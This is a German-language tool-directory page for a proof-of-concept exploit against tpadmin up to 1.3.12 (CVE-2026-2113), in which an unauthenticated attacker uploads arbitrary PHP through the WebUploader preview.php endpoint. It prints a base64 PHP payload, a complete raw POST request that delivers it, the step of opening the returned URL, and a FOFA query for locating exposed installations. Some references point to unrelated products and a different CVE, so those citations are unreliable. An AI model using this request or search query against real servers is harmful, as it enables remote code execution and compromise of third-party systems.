Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
tpadmin-CVE-2026-2113-poc — Eine Schwachstelle zur Remote Code Execution (RCE), die es nicht authentifizierten Angreifern ermöglicht, beliebige PHP-Dateien direkt auf den Webserver hochzuladen. Dies führt zu einer sofortigen Remote Code Execution mit den Rechten des Webservers. | Kitploit
Tools/GitHubGitHub/maxmnml/tpadmin-cve-2026-2113-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmaxmnml/tpadmin-cve-2026-2113-poc

tpadmin-CVE-2026-2113-poc

Eine Schwachstelle zur Remote Code Execution (RCE), die es nicht authentifizierten Angreifern ermöglicht, beliebige PHP-Dateien direkt auf den Webserver hochzuladen. Dies führt zu einer sofortigen Remote Code Execution mit den Rechten des Webservers.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
3vor 7 MonatenNoch nicht geprüft
Teilen

tpadmin-CVE-2026-2113-poc

Ein Proof-of-Concept, der eine Remote Code Execution mit Webserver-Rechten über beliebiges Datei-Hochladen (Arbitrary File Upload) ausnutzt.

Beschreibung der Schwachstelle

Eine kritische Schwachstelle für Remote Code Execution besteht in der WebUploader-Preview-Komponente des H-ui.admin-Systems. Die Datei <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> weist keine ordnungsgemäße Authentifizierung und Dateivalidierung auf, wodurch nicht authentifizierte Angreifer beliebige PHP-Dateien direkt auf den Webserver hochladen können. Dies führt unmittelbar zu Remote Code Execution mit Webserver-Rechten.

Betroffene Versionen

  • tpadmin bis Version 1.3.12

PoC (von sTy1H)

  1. Erstellen Sie den Payload (kodieren Sie die gefährliche Anweisung in Base64)
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
  1. Erstellen Sie die POST-Anfrage mit unserem Payload
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
  1. Rufen Sie die zurückgegebene URL auf
image

In freier Wildbahn

FOFA:

title='Tpadmin'

Auswirkungen

Ein nicht authentifizierter Remote-Angreifer kann eine Schwachstelle für beliebiges Datei-Hochladen (Arbitrary File Upload) ausnutzen, um eine RCE mit Webserver-Rechten zu erlangen.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

Behebung & Gegenmaßnahmen

Es sind keine Informationen über mögliche Gegenmaßnahmen bekannt. Es wird empfohlen, das betroffene Objekt durch ein alternatives Produkt zu ersetzen.

Referenzen

  • https://github.com/yuan1994/tpAdmin
  • https://www.smartertools.com/smartermail/release-notes/current)
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

Haftungsausschluss

Dieses Werkzeug ist ausschließlich für autorisierte Sicherheitstests bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal.

Tool herunterladen